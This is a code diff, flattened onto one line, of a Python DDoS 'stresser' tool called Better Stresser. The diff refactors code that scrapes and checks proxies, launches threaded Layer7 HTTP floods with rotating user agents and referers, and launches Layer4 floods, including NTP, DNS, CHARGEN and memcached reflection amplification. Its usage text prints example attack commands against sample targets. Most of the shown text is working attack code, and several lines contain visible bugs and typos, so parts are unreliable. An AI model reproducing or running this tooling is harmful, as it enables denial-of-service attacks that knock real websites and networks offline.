print(provider["url"]) + with suppress(TimeoutError): + data = get(provider["url"], timeout=provider["timeout"]).text + for proy in data.split("\n"): + if ":" in proxy: + proxys = proy.strip().split(":") + if Regex.IP.match(proxys[0]) and proxys[1].isnumeric(): + proxes.add(Proxy(proxys[0], int(proxys[1]), provider["type"])) + return proxes + + @staticmethod + def checkAll(proxie: Set[Proxy], url: str = "http://google.com", timeout: int = 1) -> Set[Proxy]: + def checkProxy(poxy: Proxy) -> Tuple[bool, Proxy]: + return poxy.Check(timeout=timeout, url=url), poxy + + return {pro[1] for pro in Pool(len(proxies) // cpu_count()).map(checkProxy, proxie) if pro[0]} -def check(domain): - if str("http") not in str(domain): - domain = "http://" + domain - print('please wait ...') - r = requests.get(domain, timeout=20) - if str("50") in str(r.status_code): - die = "OFFLINE" - else: - die = "ONLINE" - print('\nstatus_code: ' + r.status_code) - print('status: ' + die + '\n') +class ToolsConsole: + METHODS = {"INFO", "CFIP", "DNS", "PING", "CHECK", "DSTAT"} + @staticmethod + def runConsole(): + cons = "%s@BetterStresser:~#" % gethostname() -def piger(siye): - if str("https") in str(siye): - domain = str(siye).replace('https', '').replace('/', - '').replace(':', '') - elif str("http") in str(siye): - domain = str(siye).replace('http', '').replace('/', - '').replace(':', '') - else: - domain = str(siye) - print('please wait ...') - r = pig(domain, count=5, interval=0.2) - if r.is_alive: - die = "ONLINE" - else: - die = "OFFLINE" - print('\nAddress: ' + r.address) - print('Ping: ' + r.avg_rtt) - print('Aceepted Packets: ' + r.packets_received + '/' + r.packets_sent) - print('status: ' + die + '\n') + while 1: + cmd = input(cons + " ").strip() + if not cmd: continue + if " " in cmd: + cmd, args = cmd.split(" ", 1) + cmd = cmd.upper() + if cmd == "HELP": + print("Tools:" + ", ".join(ToolsConsole.METHODS)) + print("Commands: HELP, CLEAR, BACK, EXIT") + continue -def usgeaseets(): - global metho, url, SOCKST, thr, proxylist, muli, tim, l7s, l4s, tos, ots, l3s - socks = ["1", "4", "5"] - sockst = ["socks4.txt", "socks5.txt", "http.txt"] - try: - if sys.argv[3] not in socks: - SOCKST = Choice(socks) - elif sys.argv[3]: - SOCKST = sys.argv[3] + if (cmd == "E") or \ + (cmd == "EXIT") or \ + (cmd == "Q") or \ + (cmd == "QUIT") or \ + (cmd == "LOGOUT") or \ + (cmd == "CLOSE"): + exit(-1) - else: - SOCKST = Choice(socks) - except: - SOCKST = Choice(socks) + if cmd == "CLEAR": + print("\033c") + continue - if (str(SOCKST) == str('1')): - proxylist = "http.txt" - else: - proxylist = "socks{0}.txt".format(SOCKST) + if not {cmd} & ToolsConsole.METHODS: + print("%s command not found" % cmd) + continue - try: - met = str(sys.argv[1]).upper() - if met not in list(methods): - metho = Choice(methods).lower() - elif sys.argv[1]: - metho = sys.argv[1] - else: - metho = Choice(methods).lower() - except: - metho = Choice(methods).lower() - try: - methos = metho.upper() - if (methos in l4) or (methos in l3): - url = sys.argv[2] - elif str("http") not in sys.argv[2]: - url = "https://example.ir" - elif sys.argv[2]: - url = sys.argv[2] - else: - url = "https://example.ir" - except: - url = "https://example.ir" - try: - if sys.argv[4]: - thr = sys.argv[4] - else: - thr = Intn(100, 1000) - except: - thr = Intn(10, 1000) - try: - if (sys.argv[5] not in sockst): - exit() - except IndexError: - pass - except: - print('socks type not found') - exit() + if cmd == "DSTAT": + with suppress(KeyboardInterrupt): + ld = net_io_counters(pernic=False) - try: - if sys.argv[6]: - muli = sys.argv[6] - else: - muli = Intn(5, 100) - except: - muli = Intn(5, 100) - try: - if sys.argv[7]: - tim = sys.argv[7] - else: - tim = Intn(10, 10000) - except: - tim = Intn(10, 10000) + while True: + sleep(1) - l4s = str(l4).replace("'", "").replace("[", "").replace("]", "") - l3s = str(l3).replace("'", "").replace("[", "").replace("]", "") - l7s = str(l7).replace("'", "").replace("[", "").replace("]", "") - tos = str(to).replace("'", "").replace("[", "").replace("]", "") - ots = str(ot).replace("'", "").replace("[", "").replace("]", "") + od = ld + ld = net_io_counters(pernic=False) + t = [(last - now) for now, last in zip(od, ld)] -def usge(): - usgeaseets() - print('* Coded By MH_ProDev For Better Stresser') - print( - 'python3 {} \n' - .format(sys.argv[0])) - print(' > Methods:') - print(' - L3') - print(' | {} | {} Methods'.format(l3s, len(l3))) - print(' - L4') - print(' | {} | {} Methods'.format(l4s, len(l4))) - print(' - L7') - print(' | {} | {} Methods'.format(l7s, len(l7))) - print(' - TOOLS') - print(' | {} | {} Methods'.format(tos, len(to))) - print(' - Other') - print(' | {} | {} Methods'.format(ots, len(ot))) - print(' - All {} Method \n'.format(len(methodsl))) - print('expmple:\n python3 {} {} {} {} {} {} {} {}'.format( - sys.argv[0], metho, url, SOCKST, thr, proxylist, muli, tim)) + print(("Bytes Sended %s\n" + "Bytes Recived %s\n" + "Packets Sended %s\n" + "Packets Recived %s\n" + "ErrIn %s\n" + "ErrOut %s\n" + "DropIn %s\n" + "DropOut %s\n" + "Cpu Usage %s\n" + "Memory %s\n") % (Tools.humanbytes(t[0]), + Tools.humanbytes(t[1]), + Tools.humanformat(t[2]), + Tools.humanformat(t[3]), + t[4], t[5], t[6], t[7], + str(cpu_percent()) + "%", + str(virtual_memory().percent) + "%")) + if cmd in ["CFIP", "DNS"]: + print("Soon") + continue + if cmd == "CHECK": + while True: + with suppress(TimeoutError): + domain = input(f'{cons}give-me-ipaddress# ') + if not domain: continue + if domain.upper() == "BACK": break + if domain.upper() == "CLEAR": + print("\033c") + continue + if (domain.upper() == "E") or \ + (domain.upper() == "EXIT") or \ + (domain.upper() == "Q") or \ + (domain.upper() == "QUIT") or \ + (domain.upper() == "LOGOUT") or \ + (domain.upper() == "CLOSE"): + exit(-1) + if "/" not in domain: continue + print('please wait ...', end="\r") -def makefile(text): - if text == "files/": - os.mkdir(text) - elif text == "files/proxys/": - os.mkdir(text) - else: - open(text, 'w').close() - print('File: ', text) + with get(domain, timeout=20) as r: + print(('status_code: %d\n' + 'status: %s') % (r.status_code, + "ONLINE" if r.status_code <= 500 else "OFFLINE")) + return + print("Error! ") + + if cmd == "INFO": + while True: + domain = input(f'{cons}give-me-ipaddress# ') + if not domain: continue + if domain.upper() == "BACK": break + if domain.upper() == "CLEAR": + print("\033c") + continue + if (domain.upper() == "E") or \ + (domain.upper() == "EXIT") or \ + (domain.upper() == "Q") or \ + (domain.upper() == "QUIT") or \ + (domain.upper() == "LOGOUT") or \ + (domain.upper() == "CLOSE"): + exit(-1) + domain = domain.replace('https://', '').replace('http://', '') + if "/" in domain: domain = domain.split("/")[0] + print('please wait ...', end="\r") + + info = ToolsConsole.info(domain) + + if not info["success"]: + print("Error!") + continue + + print(("Country: %s\n" + "City: %s\n" + "Org: %s\n" + "Isp: %s\n" + "Region: %s\n" + ) % (info["country"], + info["city"], + info["org"], + info["isp"], + info["region"])) + + if cmd == "PING": + while True: + domain = input(f'{cons}give-me-ipaddress# ') + if not domain: continue + if domain.upper() == "BACK": break + if domain.upper() == "CLEAR": + print("\033c") + if (domain.upper() == "E") or \ + (domain.upper() == "EXIT") or \ + (domain.upper() == "Q") or \ + (domain.upper() == "QUIT") or \ + (domain.upper() == "LOGOUT") or \ + (domain.upper() == "CLOSE"): + exit(-1) + + domain = domain.replace('https://', '').replace('http://', '') + if "/" in domain: domain = domain.split("/")[0] + + print('please wait ...', end="\r") + r = ping(domain, count=5, interval=0.2) + print(('Address: %s\n' + 'Ping: %d\n' + 'Aceepted Packets: %d/%d\n' + 'status: %s\n' + ) % (r.address, + r.avg_rtt, + r.packets_received, + r.packets_sent, + "ONLINE" if r.is_alive else "OFFLINE")) + + @staticmethod + def stop(): + print('All Attacks has been Stopped !') + for proc in process_iter(): + if proc.name() == "python.exe": + proc.kill() + + @staticmethod + def usage(): + print(('* Coded By MH_ProDev For Better Stresser\n' + 'Note: If You Don\'t Have a Proxy List, Script Won\'t Use Proxy\n' + 'If Proxy File doesn\'t exist, Script Will Download Proxy\n' + ' Layer7: python3 %s \n' + ' Layer4: python3 %s \n' + '\n' + ' > Methods:\n' + ' - Layer4\n' + ' | %s | %d Methods\n' + ' - Layer7\n' + ' | %s | %d Methods\n' + ' - Tools\n' + ' | %s | %d Methods\n' + ' - Others\n' + ' | %s | %d Methods\n' + ' - All %d Methods\n' + '\n' + 'Example:\n' + ' Layer7: python3 %s %s %s %s %s proxy.txt %s %s\n' + ' Layer4: python3 %s %s %s %s %s %s') % (argv[0], argv[0], + ", ".join(Methods.LAYER4_METHODS), + len(Methods.LAYER4_METHODS), + ", ".join(Methods.LAYER7_METHODS), + len(Methods.LAYER7_METHODS), + ", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS), + ", ".join(["TOOLS", "HELP", "STOP"]), 3, + len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS), + argv[0], + randchoice([*Methods.LAYER7_METHODS]), + "https://example.com", + randchoice([4, 5, 1]), + randint(850, 1000), + randint(50, 100), + randint(1000, 3600), + argv[0], + randchoice([*Methods.LAYER4_METHODS]), + "8.8.8.8:80", + randint(850, 1000), + randint(50, 100), + randint(1000, 3600) + )) + + # noinspection PyUnreachableCode + @staticmethod + def info(domain): + with suppress(TimeoutError), get("https://ipwhois.app/json/%s/" % domain) as s: + return s.json() + return {"success": False} if __name__ == '__main__': - import os, requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re, secrets - from time import sleep - from icmplib import ping as pig - from scapy.layers.inet import TCP - from scapy.all import * - from socket import gaierror - acceptall = [ - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", - "Accept-Encoding: gzip, deflate", - "Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", - "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Charset: iso-8859-1Accept-Encoding: gzip", - "Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1Accept-Charset: utf-8, iso-8859-1;q=0.5", - "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*Accept-Language: en-US,en;q=0.5", - "Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzipAccept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", - "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Encoding: gzipAccept-Language: en-US,en;q=0.5Accept-Charset: utf-8, iso-8859-1;q=0.5," - "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5", - "Accept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", - "Accept: text/html, application/xhtml+xml", - "Accept-Language: en-US,en;q=0.5", - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1", - "Accept: text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", - ] + with open("config.json") as f: + con = json.load(f) - data = "" - strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890" - Intn = random.randint - Choice = random.choice - if not os.path.exists('files/'): - makefile('files/') - if not os.path.exists('files/proxys/'): - makefile('files/proxys/') - if not os.path.exists('files/useragent.txt'): - makefile('files/proxys/useragent.txt') - if not os.path.exists('files/ntp_servers.txt'): - makefile('files/ntp_servers.txt') - if not os.path.exists('files/memcached_servers.txt'): - makefile('files/memcached_servers.txt') - if not os.path.exists('files/referers.txt'): - makefile('files/referers.txt') - try: - with open("files/useragent.txt", "r") as f: - readuser = str(f.readlines()).replace('\n', '').replace('\r', '') - with open("files/referers.txt", "r") as f: - readref = str(f.readlines()).replace('\n', '').replace('\r', '') - with open("files/memcached_servers.txt", "r") as f: - memsv = str(f.readlines()).replace('\n', '').replace('\r', '') - with open("files/ntp_servers.txt", "r") as f: - ntpsv = str(f.readlines()).replace('\n', '').replace('\r', '') - UserAgent = Choice(readuser) - referers = Choice(readref) - memcached_servers = Choice(memsv) - try: - bdr = str(sys.argv[1]).lower() - if bdr == "tools": - tools() - elif bdr == "stop": - stop() - elif bdr == "help": - usge() - elif len(sys.argv) <= int(7): - usge() - else: - main() - except IndexError: - usge() - except KeyboardInterrupt: - sys.exit() - except IndexError: - usge() + with suppress(IndexError): + one = argv[1].upper() + + if one == "TOOLS": ToolsConsole.runConsole() + if one == "STOP": ToolsConsole.stop() + + method = one + event = Event() + + if method in Methods.LAYER7_METHODS: + url = URL(argv[2].strip()) + threads = int(argv[4]) + rpc = int(argv[6]) + timer = int(argv[7]) + proxy_ty = int(argv[3].strip()) + proxy_li = "./files/proxys/" + argv[5].strip() + proxies: Any = set() + + if not os.path.exists("./files/useragent.txt"): exit("The Useragent file doesn't exist ") + if not os.path.exists("./files/referers.txt"): exit("The Referer file doesn't exist ") + + uagents = set(a.strip() for a in open("./files/useragent.txt", "r+").readlines()) + referers = set(a.strip() for a in open("./files/referers.txt", "r+").readlines()) + + if not uagents: exit("Empty Useragent File ") + if not referers: exit("Empty Referer File ") + + if proxy_ty not in {4, 5, 1}: exit("Socks Type Not Found [4, 5, 1]") + if threads > 1000: print("WARNING! thread is higher than 1000") + if rpc > 100: print("WARNING! RPC (Request Pre Connection) is higher than 100") + + if not os.path.exists(proxy_li): + if rpc > 100: print("WARNING! The file doesn't exist, creating files and downloading proxies.") + with open(proxy_li, "a+") as wr: + Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con) + Proxies = ProxyManager.checkAll(Proxies) + + for proxy in Proxies: + wr.write(proxy.__str__() + "\n") + + with open(proxy_li, "r+") as rr: + for pro in rr.readlines(): + pro = pro.strip().split(":") + if ":" in proxy: + if Regex.IP.match(pro[0]) and pro[1].isnumeric(): + proxies.add(Proxy(pro[0], int(pro[1]), proxy_ty)) + if not proxies: + print("Empty Proxy File, Running flood witout proxy") + proxies = None + if proxies: + print("Proxy Count: %d" % len(proxies)) + for _ in range(threads): + HttpFlood(url, method, rpc, event, uagents, referers, proxy_ty, proxies).start() + if method in Methods.LAYER4_METHODS: + target = argv[2].strip() + if ":" in target and not target.split(":")[1].isnumeric(): exit("Invalid Port Number") + port = 53 if ":" not in target else int(target.split(":")[1]) + threads = int(argv[3]) + timer = int(argv[4]) + ref = None + + if ":" not in target: + print("WARNING! Port Not Selected, Set To Default: 80") + else: + target = target.split(":")[0] + + if 65535 < port or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ") + if not Regex.IP.match(target): exit("Invalid Ip Selected") + + if method in {"NTP", "DNS", "CHAR", "MEM"}: + if len(argv) == 5: + if not os.path.exists(".files/%s" % argv[5]): exit("The Reflector file doesn't exist ") + ref = set(a.strip() for a in open(".files/%s" % argv[5], "r+").readlines()) + + if not ref: exit("Empty Reflector File ") + + for _ in range(threads): + Layer4((target, port), ref, method, event).start() + + print("Attack Success Started !") + event.set() + while timer: + timer -= 1 + sleep(1) + event.clear() + exit() + ToolsConsole.usage()